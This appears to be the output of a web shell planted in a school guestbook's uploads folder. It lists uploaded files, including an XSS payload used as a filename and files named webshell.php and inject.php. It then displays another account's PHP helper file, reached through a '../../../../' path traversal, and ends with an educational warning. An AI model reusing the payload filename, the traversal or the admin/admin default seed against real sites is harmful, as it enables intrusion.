
Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../577320.klas4s23.mid-ica.nl/public_html/../public_html/stemzijzer/lib/functions.php

<?php
require_once __DIR__ . '/../config/config.php';

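/**
 * Return the shared PDO connection, opening it on first use.
 *
 * Connection settings come from the DB_* constants in config/config.php.
 * Error mode is set to exceptions so failed queries surface instead of
 * returning false, and rows are fetched as associative arrays.
 *
 * @throws PDOException when the connection cannot be established.
 */
function db(): PDO {
    static $pdo = null;
    if ($pdo === null) {
        $dsn = 'mysql:host=' . DB_HOST . ';dbname=' . DB_NAME . ';charset=utf8mb4';
        $pdo = new PDO($dsn, DB_USER, DB_PASS, [
            PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
            // Use real server-side prepared statements so bound values are
            // never spliced into the SQL text on the client side.
            PDO::ATTR_EMULATE_PREPARES   => false,
        ]);
    }
    return $pdo;
}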

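/**
 * Escape a string for use in HTML text or attribute content.
 *
 * ENT_SUBSTITUTE is included so that invalid UTF-8 is replaced with U+FFFD
 * rather than causing htmlspecialchars() to return an empty string and
 * silently drop the whole value (e.g. a flash message).
 */
function h(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}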

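/**
 * Send a Location header and stop the script.
 *
 * Site-relative paths are resolved against BASE_URL; only a genuine
 * absolute http:// or https:// URL is sent unchanged. Callers must not pass
 * user-controlled absolute URLs here, since those would be redirected to
 * verbatim (open redirect).
 */
function redirect(string $path) {
    // A bare "http..." prefix is not enough to bypass BASE_URL: require a
    // real scheme. An empty path is treated as "/" instead of indexing
    // into an empty string.
    if (!preg_match('#^https?://#i', $path)) {
        if ($path === '' || $path[0] !== '/') {
            $path = '/' . $path;
        }
        $path = BASE_URL . $path;
    }
    header('Location: ' . $path);
    exit;
}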

/**
 * Start the PHP session unless one is already active.
 */
function start_session() {
    $alreadyActive = session_status() === PHP_SESSION_ACTIVE;
    if (!$alreadyActive) {
        session_start();
    }
}

/**
 * Return the session's CSRF token, generating a random one if none is set.
 */
function csrf_token(): string {
    start_session();
    if (empty($_SESSION['csrf'])) {
        // 32 random bytes, hex-encoded: 64 characters.
        $fresh = bin2hex(random_bytes(32));
        $_SESSION['csrf'] = $fresh;
    }
    return $_SESSION['csrf'];
}

/**
 * Render the hidden form input carrying the session CSRF token.
 */
function csrf_field(): string {
    $value = h(csrf_token());
    return sprintf('<input type="hidden" name="csrf" value="%s">', $value);
}

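/**
 * Validate the CSRF token submitted with a POST form.
 *
 * Returns true only when the session holds a non-empty token and the posted
 * `csrf` field is a string equal to it (constant-time comparison).
 *
 * Requiring a non-empty session token matters: hash_equals('', '') is true,
 * so a session that has never rendered a form (no token set yet) would
 * otherwise accept a request carrying an empty `csrf` value.
 */
function verify_csrf(): bool {
    start_session();
    $expected = $_SESSION['csrf'] ?? '';
    $given = $_POST['csrf'] ?? null;
    // Non-string input (e.g. csrf[]=x) would make hash_equals() warn or throw.
    if (!is_string($expected) || $expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given);
}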

/**
 * Queue a flash message in the session for display on the next page.
 *
 * @param string $type 'error' or anything else (rendered as success).
 * @param string $msg  plain text; escaped when rendered.
 */
function flash_set(string $type, string $msg) {
    start_session();
    $entry = ['type' => $type, 'msg' => $msg];
    $_SESSION['flash'][] = $entry;
}

/**
 * Render and clear all queued flash messages as HTML alert divs.
 *
 * Message text is escaped with h(); the type only selects the CSS class.
 */
function flash_show(): string {
    start_session();
    $queued = $_SESSION['flash'] ?? [];
    if (empty($queued)) {
        return '';
    }
    $html = '';
    foreach ($queued as $flash) {
        $class = ($flash['type'] === 'error') ? 'alert error' : 'alert success';
        $html .= '<div class="' . $class . '">' . h($flash['msg']) . '</div>';
    }
    unset($_SESSION['flash']);
    return $html;
}

/**
 * Seed a 'superadmin' user named admin with password admin when no row
 * with username 'admin' exists yet.
 *
 * NOTE(review): admin/admin is a well-known default credential. This is
 * only acceptable if the deployment forces a password change on first
 * login or removes this call after initial setup — confirm against the
 * login flow, which is not visible in this file.
 */
function ensure_default_admin() {
    // Create default superadmin (admin/admin) if not present
    $pdo = db();
    $stmt = $pdo->prepare("SELECT id FROM users WHERE username = 'admin' LIMIT 1");
    $stmt->execute();
    if (!$stmt->fetch()) {
        // Stored with password_hash(); never compare against the plaintext.
        $hash = password_hash('admin', PASSWORD_DEFAULT);
        $pdo->prepare("INSERT INTO users (username, password_hash, role) VALUES ('admin', :hash, 'superadmin')")
            ->execute([':hash' => $hash]);
    }
}

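/**
 * Count the rows in $table.
 *
 * A table name is an identifier and cannot be bound as a parameter, so it
 * is quoted with backticks (escaped the same way table_has_column() does)
 * instead of being interpolated raw into the SQL. Callers should still only
 * pass known, hard-coded table names.
 *
 * @throws PDOException if the table does not exist or the query fails.
 */
function count_table(string $table): int {
    $pdo = db();
    $ident = '`' . str_replace('`', '``', $table) . '`';
    $count = $pdo->query("SELECT COUNT(*) FROM {$ident}")->fetchColumn();
    return (int) $count;
}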

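/**
 * Store an uploaded logo image and return its web path, or null when no
 * file was submitted.
 *
 * The type is decided from the file contents via finfo, never from the
 * client-supplied name or MIME type, and the stored extension is derived
 * from that result. The file is saved under a random name, so the original
 * filename never reaches the filesystem.
 *
 * NOTE(review): a valid PNG/JPEG can still carry a PHP payload in its
 * metadata; this is only safe if UPLOAD_DIR is served without script
 * execution — confirm the web server config.
 *
 * @param array $file one entry of $_FILES.
 * @return string|null path relative to the web root ('assets/uploads/…').
 * @throws RuntimeException on upload error, oversized file, unsupported
 *         type, or a failed write.
 */
function save_logo(array $file): ?string {
    $error = $file['error'] ?? null;
    if (empty($file['name']) || $error === UPLOAD_ERR_NO_FILE) {
        return null;
    }
    if ($error !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload mislukt.');
    }
    if (($file['size'] ?? 0) > 2 * 1024 * 1024) {
        throw new RuntimeException('Bestand te groot (max 2MB).');
    }
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime = $finfo ? finfo_file($finfo, $file['tmp_name']) : false;
    if ($finfo) {
        finfo_close($finfo);
    }
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/jpg' => 'jpg'];
    // A failed sniff (finfo unavailable or unreadable file) is rejected,
    // not treated as an allowed type.
    if ($mime === false || !isset($allowed[$mime])) {
        throw new RuntimeException('Alleen PNG en JPG zijn toegestaan.');
    }
    // mkdir may legitimately fail in a race with another request; only
    // give up if the directory still does not exist afterwards.
    if (!is_dir(UPLOAD_DIR) && !@mkdir(UPLOAD_DIR, 0775, true) && !is_dir(UPLOAD_DIR)) {
        throw new RuntimeException('Kon bestand niet opslaan.');
    }
    $name = bin2hex(random_bytes(8)) . '.' . $allowed[$mime];
    $dest = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;
    // move_uploaded_file() also verifies tmp_name really came from this request.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Kon bestand niet opslaan.');
    }
    // Web path
    return 'assets/uploads/' . $name;
}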

/**
 * Check if a table contains a specific column (MySQL only).
 *
 * The table name is backtick-quoted as an identifier; the column name is
 * bound as the LIKE pattern. Any database error, including an unknown
 * table, is reported as false.
 */
function table_has_column(string $table, string $column): bool {
    $ident = '`' . str_replace('`', '``', $table) . '`';
    try {
        $stmt = db()->prepare("SHOW COLUMNS FROM {$ident} LIKE :col");
        $stmt->execute([':col' => $column]);
        $row = $stmt->fetch();
    } catch (Throwable $e) {
        return false;
    }
    return (bool) $row;
}

/**
 * Look up a party's stored position on a question.
 *
 * @return string|null the position value, or null when no row exists.
 */
function party_position(int $partyId, int $questionId): ?string {
    $sql = 'SELECT position FROM party_positions WHERE party_id = :p AND question_id = :q';
    $stmt = db()->prepare($sql);
    $stmt->execute([':p' => $partyId, ':q' => $questionId]);
    $row = $stmt->fetch();
    if (!$row || !isset($row['position'])) {
        return null;
    }
    return $row['position'];
}

/**
 * Insert or update a party's position on a question.
 *
 * Any value other than 'pro', 'neutral' or 'contra' is stored as 'neutral'.
 */
function set_party_position(int $partyId, int $questionId, string $pos): void {
    static $validPositions = ['pro', 'neutral', 'contra'];
    if (!in_array($pos, $validPositions, true)) {
        $pos = 'neutral';
    }
    $sql = "
        INSERT INTO party_positions (party_id, question_id, position)
        VALUES (:p, :q, :pos)
        ON DUPLICATE KEY UPDATE position = VALUES(position)
    ";
    db()->prepare($sql)->execute([':p' => $partyId, ':q' => $questionId, ':pos' => $pos]);
}

⚠️ Educational Warning: This page demonstrates a web shell planted in a web-accessible uploads directory. The listing above shows executable files (several *.php, a *.php.JPG, *.svg and *.html) stored next to ordinary images, which suggests the upload handler did not restrict file types or serving of those files, and the viewer is reading a file from a different account's home directory (`../../../../577320.klas4s23.mid-ica.nl/...`). In a real attack this gives arbitrary command execution as the web server user, exposure of database credentials from config files, and potentially complete server compromise.